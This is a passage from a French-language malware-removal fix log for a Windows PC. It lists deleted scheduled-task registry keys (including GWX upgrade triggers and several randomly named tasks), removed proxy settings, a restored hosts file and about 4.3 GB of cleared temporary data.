HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{210DCECD-2BBE-4DB1-887B-E08070DC0277} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{210DCECD-2BBE-4DB1-887B-E08070DC0277} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4D2229F6-9057-4554-96BB-638D2B3413F2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4D2229F6-9057-4554-96BB-638D2B3413F2} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4E88D496-CC54-4A3C-A90F-14DBBC6102D9} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4E88D496-CC54-4A3C-A90F-14DBBC6102D9} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{87312B8B-C515-48BA-91C7-C22B22EC19AD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87312B8B-C515-48BA-91C7-C22B22EC19AD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{87A1F38C-D9AB-4461-9B37-2C8FC7BDD45F} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\TMUDLO1 => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\TMUDLO1 => clé non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{8CAC4934-4860-45C9-B0C0-C73B6E009D1F} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CAC4934-4860-45C9-B0C0-C73B6E009D1F} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\H9pNxeThzq => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\H9pNxeThzq => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{C67EFBA8-EBDC-43B4-A63F-31CE3EEDCCEE} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C67EFBA8-EBDC-43B4-A63F-31CE3EEDCCEE} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDF7C605-8044-4D53-9DD8-23B221AAD9A7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDF7C605-8044-4D53-9DD8-23B221AAD9A7} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CE11AE79-08AA-451D-B19C-48701C736423} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CE11AE79-08AA-451D-B19C-48701C736423} => clé supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\{0F090E47-0B0A-0E78-0A11-78090E7A110A} => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{0F090E47-0B0A-0E78-0A11-78090E7A110A} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{DB737CB4-5266-49CB-94E8-944E42EFC0BD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{DB737CB4-5266-49CB-94E8-944E42EFC0BD} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E6F99E49-200A-4ACE-94EE-E4AB2B93064D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E6F99E49-200A-4ACE-94EE-E4AB2B93064D} => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d => clé supprimé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{EE69D39D-FB48-483D-8722-BA12437EC025} => clé non trouvé(e).
C:\WINDOWS\System32\Tasks\QMPVCBFUEWAKKBHA => non trouvé(e).
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\QMPVCBFUEWAKKBHA => clé non trouvé(e).
C:\WINDOWS\Tasks\QMPVCBFUEWAKKBHA.job => non trouvé(e).
C:\WINDOWS\Tasks\TMUDLO1.job => non trouvé(e).
========= RemoveProxy: =========
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-898736392-941528643-2870755839-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings => valeur supprimé(es) avec succès
HKU\S-1-5-21-898736392-941528643-2870755839-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings => valeur supprimé(es) avec succès
========= Fin de RemoveProxy: =========
C:\Windows\System32\Drivers\etc\hosts => déplacé(es) avec succès
Hosts restauré(es) avec succès.
=========== EmptyTemp: ==========
BITS transfer queue => 6053888 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 306955926 B
Java, Flash, Steam htmlcache => 15557 B
Windows/system/drivers => 1379228 B
Edge => 9265296 B
Chrome => 0 B
Firefox => 398533502 B
Opera => 0 B
Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 2486 B
NetworkService => 982440 B
LYDIE => 41754943 B
RecycleBin => 3832775429 B
EmptyTemp: => 4.3 GB données temporaires supprimées.
================================
Le système a dû redémarrer.
==== Fin de Fixlog 13:53:56 ====